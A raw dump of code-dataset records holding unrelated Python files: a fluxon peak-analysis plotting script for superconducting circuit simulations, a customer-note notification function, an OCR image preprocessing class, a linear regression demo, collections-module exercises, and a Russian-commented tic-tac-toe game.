False\nplot_wr_data__currents_and_voltages(data_dict,data_to_plot,plot_save_string)\n\n#%% find peaks for each jj\ntime_vec = data_dict['time']\nj_df = data_dict['v(3)']\nj_jtl = data_dict['v(4)']\nj_di = data_dict['v(5)']\n\ninitial_ind = (np.abs(time_vec-2.0e-9)).argmin()\nfinal_ind = (np.abs(time_vec-42e-9)).argmin()\n\ntime_vec = time_vec[initial_ind:final_ind]\nj_df = j_df[initial_ind:final_ind]\nj_jtl = j_jtl[initial_ind:final_ind]\nj_di = j_di[initial_ind:final_ind]\n\n# fig, ax = plt.subplots(nrows = 1, ncols = 1, sharex = True, sharey = False) \n# ax.plot(time_vec*1e9,j_df*1e3, '-', ) \n# ax.set_xlabel(r'Time [ns]')\n# ax.set_ylabel(r'Voltage [mV]')\n# plt.show()\n \nj_df_peaks, _ = find_peaks(j_df, height = [140e-6,175e-6])\nj_jtl_peaks, _ = find_peaks(j_jtl, height = 200e-6)\nj_di_peaks, _ = find_peaks(j_di, height = 200e-6)\n\n# fig, ax = plt.subplots(nrows = 1, ncols = 1, sharex = True, sharey = False) \n# ax.plot(time_vec*1e9,j_df*1e3, '-', label = 'data') \n# ax.plot(time_vec[j_df_peaks]*1e9,j_df[j_df_peaks]*1e3, 'x', label = 'peaks')\n# ax.set_xlabel(r'Time [ns]')\n# ax.set_ylabel(r'Voltage [mV]')\n# ax.legend()\n# plt.show()\n\nfig, ax = plt.subplots(nrows = 3, ncols = 1, sharex = True, sharey = False)\nfig.suptitle(file_name) \nax[0].plot(time_vec*1e9,j_df*1e3, '-', label = '$J_{df}$') \nax[0].plot(time_vec[j_df_peaks]*1e9,j_df[j_df_peaks]*1e3, 'x')\nax[0].set_xlabel(r'Time [ns]')\nax[0].set_ylabel(r'Voltage [mV]')\nax[0].legend()\nax[1].plot(time_vec*1e9,j_jtl*1e3, '-', label = '$J_{jtl}$') \nax[1].plot(time_vec[j_jtl_peaks]*1e9,j_jtl[j_jtl_peaks]*1e3, 'x')\nax[1].set_xlabel(r'Time [ns]')\nax[1].set_ylabel(r'Voltage [mV]')\nax[1].legend()\nax[2].plot(time_vec*1e9,j_di*1e3, '-', label = '$J_{di}$') \nax[2].plot(time_vec[j_di_peaks]*1e9,j_di[j_di_peaks]*1e3, 'x')\nax[2].set_xlabel(r'Time [ns]')\nax[2].set_ylabel(r'Voltage [mV]')\nax[2].legend()\nplt.show()\n\n#%% find inter-fluxon intervals and fluxon generation rates for each JJ\n\nI_di = data_dict['L3#branch']\nI_di = I_di[initial_ind:final_ind]\nI_drive = data_dict['L4#branch']\nI_drive = I_drive[initial_ind:final_ind]\n\nj_df_ifi = np.diff(time_vec[j_df_peaks])\nj_jtl_ifi = np.diff(time_vec[j_jtl_peaks])\nj_di_ifi = np.diff(time_vec[j_di_peaks])\n\nj_df_rate = 1/j_df_ifi\nj_jtl_rate = 1/j_jtl_ifi\nj_di_rate = 1/j_di_ifi\n\nfig, ax = plt.subplots(nrows = 1, ncols = 1, sharex = True, sharey = False) \nfig.suptitle(file_name)\nax.plot(time_vec*1e9,I_drive*1e6, '-', label = '$I_{drive}$') \nax.plot(time_vec*1e9,I_di*1e6, '-', label = '$I_{di}$') \nax.set_xlabel(r'Time [ns]')\nax.set_ylabel(r'Current [$\\mu$A]')\nax.legend()\nplt.show()\n\nfig, ax = plt.subplots(nrows = 2, ncols = 3, sharex = False, sharey = False) \nfig.suptitle(file_name) \n\nax[0,0].plot(time_vec[j_df_peaks[0:-1]]*1e9,j_df_ifi*1e12, '-', label = '$J_{df}$ IFI') \nax[0,0].plot(time_vec[j_jtl_peaks[0:-1]]*1e9,j_jtl_ifi*1e12, '-', label = '$J_{jtl}$ IFI') \nax[0,0].plot(time_vec[j_di_peaks[0:-1]]*1e9,j_di_ifi*1e12, '-', label = '$J_{di}$ IFI') \nax[0,0].set_xlabel(r'Time [ns]')\nax[0,0].set_ylabel(r'Inter-fluxon interval [ps]')\nax[0,0].legend()\n \nax[0,1].plot(I_drive[j_df_peaks[0:-1]]*1e6,j_df_ifi*1e12, '-', label = '$J_{df}$ IFI') \nax[0,1].plot(I_drive[j_jtl_peaks[0:-1]]*1e6,j_jtl_ifi*1e12, '-', label = '$J_{jtl}$ IFI') \nax[0,1].plot(I_drive[j_di_peaks[0:-1]]*1e6,j_di_ifi*1e12, '-', label = '$J_{di}$ IFI') \nax[0,1].set_xlabel(r'$I_{drive}$ [$\\mu$A]')\nax[0,1].legend()\n \nax[0,2].plot(I_di[j_df_peaks[0:-1]]*1e6,j_df_ifi*1e12, '-', label = '$J_{df}$ IFI') \nax[0,2].plot(I_di[j_jtl_peaks[0:-1]]*1e6,j_jtl_ifi*1e12, '-', label = '$J_{jtl}$ IFI') \nax[0,2].plot(I_di[j_di_peaks[0:-1]]*1e6,j_di_ifi*1e12, '-', label = '$J_{di}$ IFI') \nax[0,2].set_xlabel(r'$I_{di}$ [$\\mu$A]')\nax[0,2].legend()\nax[0,2].set_title(file_name)\n\n \nax[1,0].plot(time_vec[j_df_peaks[0:-1]]*1e9,j_df_rate*1e-9, '-', label = '$J_{df}$ rate') \nax[1,0].plot(time_vec[j_jtl_peaks[0:-1]]*1e9,j_jtl_rate*1e-9, '-', label = '$J_{jtl}$ rate') \nax[1,0].plot(time_vec[j_di_peaks[0:-1]]*1e9,j_di_rate*1e-9, '-', label = '$J_{di}$ rate') \nax[1,0].set_xlabel(r'Time [ns]')\nax[1,0].set_ylabel(r'Fluxon generation rate [GHz]')\nax[1,0].legend()\n \nax[1,1].plot(I_drive[j_df_peaks[0:-1]]*1e6,j_df_rate*1e-9, '-', label = '$J_{df}$ rate') \nax[1,1].plot(I_drive[j_jtl_peaks[0:-1]]*1e6,j_jtl_rate*1e-9, '-', label = '$J_{jtl}$ rate') \nax[1,1].plot(I_drive[j_di_peaks[0:-1]]*1e6,j_di_rate*1e-9, '-', label = '$J_{di}$ rate') \nax[1,1].set_xlabel(r'$I_{drive}$ [$\\mu$A]')\nax[1,1].legend()\n\nax[1,2].plot(I_di[j_df_peaks[0:-1]]*1e6,j_df_rate*1e-9, '-', label = '$J_{df}$ rate') \nax[1,2].plot(I_di[j_jtl_peaks[0:-1]]*1e6,j_jtl_rate*1e-9, '-', label = '$J_{jtl}$ rate') \nax[1,2].plot(I_di[j_di_peaks[0:-1]]*1e6,j_di_rate*1e-9, '-', label = '$J_{di}$ rate') \nax[1,2].set_xlabel(r'$I_{di}$ [$\\mu$A]')\nax[1,2].legend()\n\n\n \n# fig, ax = plt.subplots(1,1)\n# error = ax.imshow(np.log10(np.transpose(error_mat[:,:])), cmap = plt.cm.viridis, interpolation='none', extent=[vec1[0],vec1[-1],vec2[0],vec2[-1]], aspect = 'auto', origin = 'lower')\n# cbar = fig.colorbar(error, extend='both')\n# cbar.minorticks_on() \n# fig.suptitle('log10(Error) versus {} and {}'.format(x_label,y_label))\n# plt.title(title_string)\n# ax.set_xlabel(r'{}'.format(x_label))\n# ax.set_ylabel(r'{}'.format(y_label)) \n# plt.show() \n# fig.savefig('figures/'+save_str+'__log.png') \n\n#%% find delay between junctions\n\ndelay_df_jtl = np.zeros([len(j_jtl_peaks)])\ndelay_jtl_di = np.zeros([len(j_di_peaks)])\ndelay_di_df = np.zeros([len(j_di_peaks)])\n\nfor ii in range(len(j_jtl_peaks)):\n delay_df_jtl[ii] = time_vec[j_jtl_peaks[ii]]-time_vec[j_df_peaks[ii]]\nfor ii in range(len(j_di_peaks)):\n delay_jtl_di[ii] = time_vec[j_di_peaks[ii]]-time_vec[j_jtl_peaks[ii]]\nfor ii in range(len(j_di_peaks)):\n delay_di_df[ii] = time_vec[j_df_peaks[ii+1]]-time_vec[j_di_peaks[ii]]\n\n\nfig, ax = plt.subplots(nrows = 1, ncols = 3, sharex = False, sharey = True)\nfig.suptitle(file_name)\n\nax[0].plot(time_vec[j_jtl_peaks]*1e9,delay_df_jtl*1e12, '-', label = '$\\Delta t_{jtl-df}$') \nax[0].plot(time_vec[j_di_peaks]*1e9,delay_jtl_di*1e12, '-', label = '$\\Delta t_{di-jtl}$')\nax[0].plot(time_vec[j_di_peaks]*1e9,delay_di_df*1e12, '-', label = '$\\Delta t_{di-df}$')\nax[0].set_xlabel(r'Time [ns]')\nax[0].set_ylabel(r'Delay between fluxons from adjacent JJs [ps]')\nax[0].legend()\n\nax[1].plot(I_drive[j_jtl_peaks]*1e6,delay_df_jtl*1e12, '-', label = '$\\Delta t_{jtl-df}$') \nax[1].plot(I_drive[j_di_peaks]*1e6,delay_jtl_di*1e12, '-', label = '$\\Delta t_{di-jtl}$')\nax[1].plot(I_drive[j_di_peaks]*1e6,delay_di_df*1e12, '-', label = '$\\Delta t_{di-df}$')\nax[1].set_xlabel(r'$I_{drive}$ [$\\mu$A]')\nax[1].legend()\n\nax[2].plot(I_di[j_jtl_peaks]*1e6,delay_df_jtl*1e12, '-', label = '$\\Delta t_{jtl-df}$') \nax[2].plot(I_di[j_di_peaks]*1e6,delay_jtl_di*1e12, '-', label = '$\\Delta t_{di-jtl}$')\nax[2].plot(I_di[j_di_peaks]*1e6,delay_di_df*1e12, '-', label = '$\\Delta t_{di-df}$')\nax[2].set_xlabel(r'$I_{di}$ [$\\mu$A]')\nax[2].legend()\n\nplt.show()\n\n#%% fit total delay to functional form\n\n# popt, pcov = curve_fit(inter_fluxon_interval__fit_2, I_di[j_df_peaks[0:-1]], j_df_ifi, p0 = [50e-12,19e-6,2.8,0.5,105e-6], bounds = ([10e-12,10e-6, 0, 0, 10e-6], [100e-12,30e-6, 3., 1., 200e-6]))\n\n# fig, ax = plt.subplots(nrows = 1, ncols = 1, sharex = True, sharey = False) \n# ax.plot(I_di[j_df_peaks[0:-1]]*1e6,j_df_ifi*1e12, '-', label = 'WR') \n# ax.plot(I_di*1e6,inter_fluxon_interval__fit_2(I_di,*popt)*1e12, '-', label = 'Fit: t0 = {:3.2f}ps, $I_f$ = {:2.2f}uA, mu1 = {:1.3f}, mu2 = {:1.3f}, V0 = {:3.3f}uV'.format(popt[0]*1e12,popt[1]*1e6,popt[2],popt[3],popt[4]*1e6)) \n# ax.set_xlabel(r'Current [$\\mu$A]')\n# ax.set_ylabel(r'Inter-fluxon interval [ps]')\n# ax.legend()\n# ax.set_ylim([0,200])\n# plt.show()\n\n# popt, pcov = curve_fit(inter_fluxon_interval__fit_3, I_di[j_df_peaks[0:-1]], j_df_ifi, bounds = ([40.1e-6,40.1e-6], [70e-6,70e-6]))\n\n# fig, ax = plt.subplots(nrows = 1, ncols = 1, sharex = True, sharey = False) \n# ax.plot(I_di[j_df_peaks[0:-1]]*1e6,j_df_ifi*1e12, '-', label = 'WR') \n# ax.plot(I_di*1e6,inter_fluxon_interval__fit_3(I_di,*popt)*1e12, '-', label = 'Fit: I_bar_1 = {:2.4f}uA, I_bar_2 = {:2.4f}uA'.format(popt[0]*1e6,popt[1]*1e6)) \n# ax.set_xlabel(r'Current [$\\mu$A]')\n# ax.set_ylabel(r'Inter-fluxon interval [ps]')\n# ax.legend()\n# ax.set_ylim([0,200])\n# plt.show()\n\n#%%\n# abcde = inter_fluxon_interval__fit_3(I_di,*popt)*1e12 \n\n#%% fit inter-fluxon interval versus current bias\n\n# plt.close('all')\n\n# inter_fluxon_interval = np.diff(time_vec__part[fluxon_peaks])\n\n# # popt, pcov = curve_fit(inter_fluxon_interval__fit, current_vec__part[fluxon_peaks[0:-1]], inter_fluxon_interval, bounds = ([0, 0, 0], [3., 1., 200e-6]))\n\n# fig, ax = plt.subplots(nrows = 1, ncols = 1, sharex = True, sharey = False) \n# ax.plot(current_vec__part[fluxon_peaks[0:-1]]*1e6,inter_fluxon_interval*1e12, '-', label = 'WR') \n# # ax.plot(current_vec__part[fluxon_peaks[0:-1]]*1e6,inter_fluxon_interval__fit(current_vec__part[fluxon_peaks[0:-1]],2.8,0.58,100e-6)*1e12, '-', label = 'Fit: mu1 = {:1.3f}, mu2 = {:1.3f}, V0 = {:3.3f}uV'.format(2.8,0.58,100e-6*1e6)) \n# ax.plot(current_vec__part[fluxon_peaks[0:-1]]*1e6,inter_fluxon_interval__fit(current_vec__part[fluxon_peaks[0:-1]],*popt)*1e12, '-', label = 'Fit: mu1 = {:1.3f}, mu2 = {:1.3f}, V0 = {:3.3f}uV'.format(popt[0],popt[1],popt[2]*1e6)) \n# ax.set_xlabel(r'Current [$\\mu$A]')\n# ax.set_ylabel(r'Inter-fluxon Interval [ps]')\n# ax.legend()\n# plt.show()\n\n# fig, ax = plt.subplots(nrows = 1, ncols = 1, sharex = True, sharey = False) \n# ax.plot(current_vec__part[fluxon_peaks[0:-1]]*1e6,1/inter_fluxon_interval*1e-9, '-', label = 'WR') \n# # ax.plot(current_vec__part[fluxon_peaks[0:-1]]*1e6,inter_fluxon_interval__fit(current_vec__part[fluxon_peaks[0:-1]],2.8,0.58,100e-6)*1e12, '-', label = 'Fit: mu1 = {:1.3f}, mu2 = {:1.3f}, V0 = {:3.3f}uV'.format(2.8,0.58,100e-6*1e6)) \n# ax.plot(current_vec__part[fluxon_peaks[0:-1]]*1e6,1/inter_fluxon_interval__fit(current_vec__part[fluxon_peaks[0:-1]],*popt)*1e-9, '-', label = 'Fit: mu1 = {:1.3f}, mu2 = {:1.3f}, V0 = {:3.3f}uV'.format(popt[0],popt[1],popt[2]*1e6)) \n# ax.set_xlabel(r'Current [$\\mu$A]')\n# ax.set_ylabel(r'Fluxon Generation Rate [GHz]')\n# ax.legend()\n# plt.show()\n\n#%%\n# xqp = inter_fluxon_interval(40e-6)","sub_path":"dendrite/_bak/s__t_fq_vs_I_flux_and_I_di.py","file_name":"s__t_fq_vs_I_flux_and_I_di.py","file_ext":"py","file_size_in_byte":11597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"212594357","text":"@staticmethod\ndef transcribe_object(app_entry_identifier=None, user_identifier=None, content=None, blob_count=0, n_key=\"n/a\"):\n \"\"\"Add a message by txt string.\"\"\"\n if app_entry_identifier is None:\n logging.error(\"A FieldApplicationEntry identifier is required to post a message\")\n return None\n if user_identifier is None:\n logging.error(\"A user identifier is required to post a message\")\n return None\n if content is None:\n logging.error(\"No message object given to post a message\")\n return None\n\n note_id = Helpers.guid()\n try:\n note = CustomerNote(\n identifier=note_id,\n field_app_identifier=app_entry_identifier,\n inserted_pacific=Helpers.pacific_now(),\n inserted_utc=datetime.now(),\n author=user_identifier,\n perms=\"public\",\n content=json.dumps(content),\n blob_count=blob_count,\n note_key=n_key,\n read=False\n )\n designee = note.get_designee()\n note.read = ((designee == note.author) or (designee is None))\n note.put()\n\n if (not note.read) and (not designee is None):\n f = GCSLockedFile(\"/ApplicationSettings/UserSettings/Notifications/\" + designee + \".json\")\n content = f.read()\n if not content is None:\n settings = json.loads(content)\n if \"new_customer_note\" in settings.keys():\n if settings[\"new_customer_note\"][\"sms\"] == True:\n try:\n app_entry = FieldApplicationEntry.first(FieldApplicationEntry.identifier == app_entry_identifier)\n rep = FieldApplicationUser.first(FieldApplicationUser.identifier == designee)\n if (not app_entry is None) and (not designee is None):\n msg = \"a new note for one of your customers (\" + app_entry.customer_first_name.strip() + \" \" + app_entry.customer_last_name.strip() + \") got recorded in the field app.\"\n Helpers.send_sms(rep.rep_phone, msg)\n except:\n logging.error(\"SMS failed\")\n if settings[\"new_customer_note\"][\"email\"] == True:\n try:\n msg2 = rep.first_name.strip() + \" \" + rep.last_name.strip() + \",\\n\\nA new note for \" + app_entry.customer_first_name.strip() + \" \" + app_entry.customer_last_name.strip() + \" was recorded:\\n\\n\\\"\" + note.content + \"\\\"\"\n Helpers.send_email(rep.rep_email, \"New Customer Note!\", msg2)\n except:\n logging.error(\"Customer note notification failed\")\n\n except:\n exctype, value = sys.exc_info()[:2]\n logging.error(\"note put error({0}): {1} while putting jsonObject\".format(exctype, value))\n note_id = None\n\n return note_id\n\n","sub_path":"classes/CustomerTranscriber_/transcribe_object.py","file_name":"transcribe_object.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"564272217","text":"import logging\n\nfrom io import BytesIO\nfrom statistics import median, StatisticsError\n\nimport cv2\nimport numpy as np\nimport pillowfight\nimport pytesseract as ocr\nfrom PIL import Image, ImageEnhance\nfrom textdetect import TextDetect\n\nlogger = logging.Logger('IQ: OCR: IMAGE')\n\n\nclass OCRImage:\n _img: any\n\n def __init__(self, data):\n self.set_image_from_bytes(data)\n\n def get_cv2(self):\n return self._img\n\n def get_image(self):\n self._img = cv2.cvtColor(self._img, cv2.COLOR_BGR2RGB)\n img = Image.fromarray(self._img)\n return img\n\n def size_down_image(self):\n height, width = self._img.shape[:2]\n max_height = 1280\n ratio = 1\n if height > max_height:\n ratio = max_height / height\n self._img = self.scale_image(ratio)\n height, width = self._img.shape[:2]\n max_width = 1280\n if width > max_width:\n ratio = max_width / width\n self._img = self.scale_image(ratio)\n return ratio\n\n def deskew(self):\n angle = self.get_image_angle()\n logger.debug(f\"angle {angle}\")\n self.rotate_image(angle)\n return angle\n\n def get_image_angle(self):\n gray = cv2.cvtColor(self._img, cv2.COLOR_BGR2GRAY)\n gray = cv2.bitwise_not(gray)\n thresh = cv2.threshold(\n gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n coords = np.column_stack(np.where(thresh > 0))\n angle = cv2.minAreaRect(coords)[-1]\n if angle < -45:\n angle = -(90 + angle)\n else:\n angle = -angle\n return angle\n\n def scale_image(self, scale=0.25):\n print(scale)\n print(self._img.shape)\n height, width = self._img.shape[:2]\n print('height: ' + str(height))\n print('width: ' + str(width))\n self._img = cv2.resize(self._img, None, fx=scale, fy=scale)\n height, width = self._img.shape[:2]\n print('new height: ' + str(height))\n print('new width: ' + str(width))\n\n return self._img\n\n def rotate_image(self, angle):\n # get the height and width of the original image\n (h, w) = self._img.shape[:2]\n # get the center of the image to calculate rotation matrix\n center = (w // 2, h // 2)\n # calculate the rotation matrix\n m = cv2.getRotationMatrix2D(center, angle, 1.0)\n print('angle: ' + str(angle))\n # rotate the image\n self._img = cv2.warpAffine(\n self._img, m, (w, h), flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_TRANSPARENT)\n # convert the image to an array\n self._img = cv2.cvtColor(self._img, cv2.COLOR_BGR2RGB)\n\n def black_and_white(self):\n self._img = cv2.cvtColor(self._img, cv2.COLOR_RGB2GRAY)\n (thresh, self._img) = cv2.threshold(\n self._img, 127, 255, cv2.THRESH_BINARY)\n if not self.is_white_background():\n print('black background')\n self._img = cv2.bitwise_not(self._img)\n print('threshold: ' + str(thresh))\n return cv2.GaussianBlur(self._img, (5, 5), 0)\n\n def is_white_background(self):\n white = cv2.countNonZero(self._img)\n return white >= self._img.size - white\n\n def set_image_from_bytes(self, data: bytes):\n img_stream = BytesIO(data)\n self._img = cv2.imdecode(np.fromstring(img_stream.read(), np.uint8), 1)\n\n def cv2_to_string(self) -> str:\n return cv2.imencode('.jpg', self._img)[1].tostring()\n\n def set_image_from_pil(self, img: Image):\n self._img = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)\n\n def scale_to_optimal_line_height(self):\n line_height = 0\n i = 1\n while line_height == 0 and i < 5:\n data = self.tess_data('--psm 12 --oem 1')\n line_height = self.get_line_height(data)\n print('line height: ' + str(line_height))\n scale = self.get_image_scale_factor(line_height, i)\n print('scale: ' + str(scale))\n self.scale_image(scale)\n i = i + 1\n return scale\n\n def unpaper(self):\n img = pillowfight.ace(self.get_image())\n img = pillowfight.unpaper_grayfilter(img)\n self.set_image_from_pil(img)\n\n def high_contrast(self):\n contrast = ImageEnhance.Contrast(self.get_image())\n self.set_image_from_pil(contrast.enhance(3))\n\n def tess_data(self, config=''):\n return ocr.image_to_data(self.get_image(), output_type=ocr.Output.DICT, config=config)\n\n def get_line_height(self, data):\n heights = self.remove_outlier_line_heights(data['height'])\n return round(median(heights))\n\n def remove_outlier_line_heights(self, line_heights, above=2.0, below=0.5):\n try:\n m = min(line_heights)\n print('minimum line height: ' + str(m))\n except StatisticsError:\n m = median(line_heights)\n print('median line height: ' + str(m))\n heights = []\n for i, h in enumerate(line_heights):\n if h < m * above and h > m * below:\n heights.append(i)\n return heights\n\n def get_image_scale_factor(self, line_height, i=1):\n if line_height == 0:\n return 0.75 ** i\n else:\n return 32 / line_height\n\n def process_image(self):\n self.high_contrast()\n self.black_and_white()\n self.unpaper()\n # self.deskew()\n\n def text_detect(self):\n td = TextDetect()\n self._img = td.text_detect(self._img)\n","sub_path":"src/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":5532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"539480438","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# loading data \n\nX = []\nY = []\n\nfor line in open('data_1d.csv'):\n x, y = line.split(',') #data in CSV file is separated by ','\n X.append(float(x))\n Y.append(float(y))\n\nX = np.array(X)\nY = np.array(Y)\n\n# plot\n\nplt.scatter(X,Y)\nplt.show()\n\n# Calculate a and b from equations\ndenominator = X.dot(X) - X.mean() * X.sum() \na= (X.dot(Y)- Y.mean()*X.sum())/denominator # since the sum of two vectors is equalivalent to the dot product. \nb = (Y.mean()*X.dot(X) - X.mean()*X.dot(Y))/denominator\n\n#calulate predicted Y \nYhat = a*X + b\n\n#plot\nplt.scatter(X,Y)\nplt.plot(X, Yhat)\nplt.show()\n\n# calculating r-squared\n\nd1 = Y - Yhat\nd2 = Y - Y.mean()\n\nr2 = 1 - d1.dot(d1) / d2.dot(d2) # since the sum is the equal of the dot product\nprint(\"the r-squared is: \", r2)\n","sub_path":"LR/s_lr.py","file_name":"s_lr.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"422377942","text":"### 1. Using Counter on lists\n\n# Import the Counter object from the collections module.\nfrom collections import Counter\n\n# Print the first ten items from the stations list\n# Using slice notation\nprint(stations[:10])\n\n# Create a Counter of the stations list: station_count\n# Counter creates a dict like object with the element as the key, and the number of times it occurs in the list as the value.\nstation_count = Counter(stations)\n\n# Print the station_count\nprint(station_count)\n\n\n### 2. Finding Most Common Elements\n\n# Import the Counter object from the collections module\nfrom collections import Counter\n\n# Create a Counter of the stations list: station_count\nstation_count = Counter(stations)\n\n# Use the `.most_common()` method to return the n most common elements in a list/collection\n# Find the 5 most common elements\nprint(station_count.most_common(5))\n\n\n### 3. Creating Dictionaries of an Unknown Structure\n\n# Create an empty dictionary: ridership\nridership ={}\n\n# Iterate over the entries (dtype=tuple)\nfor date, stop, riders in entries:\n # Check to see if date is already in the ridership dictionary\n # Use the `in` keyword to determine if the date is a key in the dictionary named \"ridership\"\n if date not in ridership:\n # Create an empty list for any missing date: key-value pair\n ridership[date] = []\n # Append the stop and riders as a tuple to the date keys list\n ridership[date].append((stop, riders))\n \n# Print the ridership for '03/09/2016'\nprint(ridership.get('03/09/2016'))\n\n\n### 4. Safely Appending to a Key's value list\n\n# Import defaultdict from the collections module.\nfrom collections import defaultdict\n\n# Create a defaultdict with a default type of list: ridership\nridership = defaultdict(list)\n\n# Iterate over the entries\nfor date, stop, riders in entries:\n # Use the stop as the key of ridership and append the riders to its value\n ridership[stop].append(riders)\n \n# Print the first 10 items of the ridership dictionary\nprint(list(ridership.items())[:10])\n\n\n### 5. Working with OrderedDictionaries\n\n# Import OrderedDict from the collections module\nfrom collections import OrderedDict\n\n# Create an OrderedDict called: ridership_date\nridership_date = OrderedDict()\n\n# Iterate over the entries\nfor date, riders in entries:\n # If a key does not exist in ridership_date, set it to 0\n if date not in ridership_date:\n ridership_date[date] = 0\n \n # Add riders to the date key in ridership_date\n ridership_date[date] += riders\n \n# Print the first 31 records\nprint(list(ridership_date.items())[:31])\n\n\n### 6. Powerful Ordered Popping\n\n# Use index notation to locate the first key from the list of keys in the dict \"ridership_date\"\n# Print the first key in ridership_date\nprint(list(ridership_date.keys())[0])\n\n# Use the `.popitem()` method to remove the first key-value pair in \"ridership_date\"\n# Pop the first item from ridership_date and print it\nprint(ridership_date.popitem(0))\n\n# Use index notation to return the last key from the list of keys\n# Print the last key in ridership_date\nprint(list(ridership_date.keys())[-1])\n\n# Use the `.popitem()` method to remove the last key-value pair in \"ridership_date\"\n# Pop the last item from ridership_date and print it\nprint(ridership_date.popitem(-1))\n\n\n### 7. Creating namedtuples for Storing Data\n\n# Import namedtuple from the collections module\nfrom collections import namedtuple\n\n# So freakin' awesome!!!\n# Create the namedtuple: DateDetails\n# Create a container called 'DateDetails' that accepts 3 name attribute to capture rider information.\nDateDetails = namedtuple('DateDetails', ['date', 'stop', 'riders'])\n\n# Create the empty list: labeled_entries\nlabeled_entries = []\n\n# Iterate over each tuple in \"entries\" list\nfor date, stop, riders in entries:\n # Append a new DateDetails namedtuple instance for each entry to labeled_entries\n labeled_entries.append(DateDetails(date, stop, riders))\n \n# Print the first 5 items in labeled_entries\nprint(labeled_entries[:5])\n\n\n### 8. Leveraging Attributes on namedtuples\n\n# Iterate over the first twenty items in labeled_entries\n# Each item in \"labeled_entries\" is a namedtuple object with named attributes!!! \nfor item in labeled_entries[:20]:\n # Print each item's stop using the attribute .stop\n print(item.stop)\n\n # Print each item's date using the attribute .date\n print(item.date)\n\n # Print each item's riders using the attribute .riders\n print(item.riders)","sub_path":"datacamp/collections_module.py","file_name":"collections_module.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"83137751","text":"a11, a12, a13, a21, a22, a23, a31, a32, a33 = 1, 2, 3, 4, 5, 6, 7, 8, 9\nl_ = [a11, a12, a13, a21, a22, a23, a31, a32, a33]\nn = 0 # счетчик ходов sdf\nwin_x = 0 # счетчик побед икса\nwin_o = 0 # счетчик побед нуля\ndraw = 0 # счетчик ничей\nс = 0 # условие: если c = 1, то нужно выходить из программы (испавляет баг)\ndef restart(): # главня функция, которая перезпускает игру\n global l_, n, a, win_x, win_o, draw, c\n global a11, a12, a13, a21, a22, a23, a31, a32, a33, q\n a = 0 # зануляем счетчики\n q = 0 # --\n c = 0\n a11, a12, a13, a21, a22, a23, a31, a32, a33 = 1, 2, 3, 4, 5, 6, 7, 8, 9\n l_ = [a11, a12, a13, a21, a22, a23, a31, a32, a33]\n n = 0 # --\n paint() # выводим игру на консоль\n play() # начинаем игру\n if a == 0 and c == 0: # если победитель не определен и команда выхода не была объявлена, то вызываем функцию ничьи\n draw_f()\ndef paint(): # выводит тело игры на консоль\n global n\n n += 1 # ход\n print(l_[0], '|', l_[1], '|', l_[2])\n print('__|___|__')\n print(l_[3], '|', l_[4], '|', l_[5])\n print('__|___|__')\n print(l_[6], '|', l_[7], '|', l_[8])\n\ndef xmove(): # добавляет х вместо введенного числа\n for k in l_:\n if k == q:\n l_[k - 1] = 'x'\ndef omove(): # добавляет о вместо введенного числа\n for h in l_:\n if h == q:\n l_[h - 1] = 'o'\n\ndef input_num(): # функция ввода числа\n global q # введенное число\n q = int(input('введите число от 1 до 9 '))\n if q not in l_:\n print(\"введите другое число\")\n input_num()\ndef win(): # функция условия победы\n global a\n if l_[0] == l_[1] == l_[2] or l_[0] == l_[3] == l_[6] or l_[0] == l_[4] == l_[8] or l_[1] == l_[4] == l_[7] or l_[2] == l_[5] == l_[8] or l_[3] == l_[4] == l_[5] or l_[6] == l_[7] == l_[8] or l_[6] == l_[4] == l_[2]:\n a = 1 # если какая-нибудь строка, столбец или диагональ состоит из одинаковых элементов\n else:\n a = 0 # если нет победителя\ndef play(): # функция самой игры, возвращает победителя\n global win_o, win_x, draw, c\n for i in range(9):\n if c != 0:\n break\n if a == 1: # если уже есть победитель, то в этот цикл входить нельзя\n break\n if n % 2 == 1: # если номер хода нечетный, то записываем х\n input_num() # вводим число\n xmove() # записываем х в список\n paint() # вызываем игру на консоль\n win() # вызываем значение a, которое отвечает за победу\n if a == 1: # то есть победитель есть\n win_x += 1 # даем очко победы\n print(f\"Выиграл х \\nСчёт х:о - {win_x}:{win_o}, ничей: {draw}\") # счет партии\n if input('Сыграем снова? (y/n) ') == str('y'): # после завершения игры предлагает сыграть снова\n print('Новая игра!')\n restart() # вызываем главную функцию запуска игры\n else:\n print('Выход')\n break # выходим из игры\n else: # если номер хода нечетный, то записываем о\n input_num()\n omove()\n paint()\n win()\n if a == 1:\n win_o += 1\n print(f\"Выиграл o \\nСчёт х:о - {win_x}:{win_o}, ничей: {draw}\")\n if input('Сыграем снова? (y/n) ') == str('y'):\n print('Новая игра!')\n restart()\n else:\n print('Выход')\n break\n\ndef draw_f(): # функция ничьи\n global a, win_x, win_o, draw\n if a == 0: # если победитель так и не появился, то увеличиваем колво ничей\n draw += 1\n print(f\"Ничья!\\nСчёт х:о - {win_x}:{win_o}, ничей: {draw}\")\n if input('Сыграем снова? (y/n) ') == str('y'):\n print('Новая игра!')\n restart()\n else:\n global c\n c = 1\n print('Выход')\nrestart() # запускает саму программу в первый раз\n","sub_path":"MAIN2.py","file_name":"MAIN2.py","file_ext":"py","file_size_in_byte":5096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}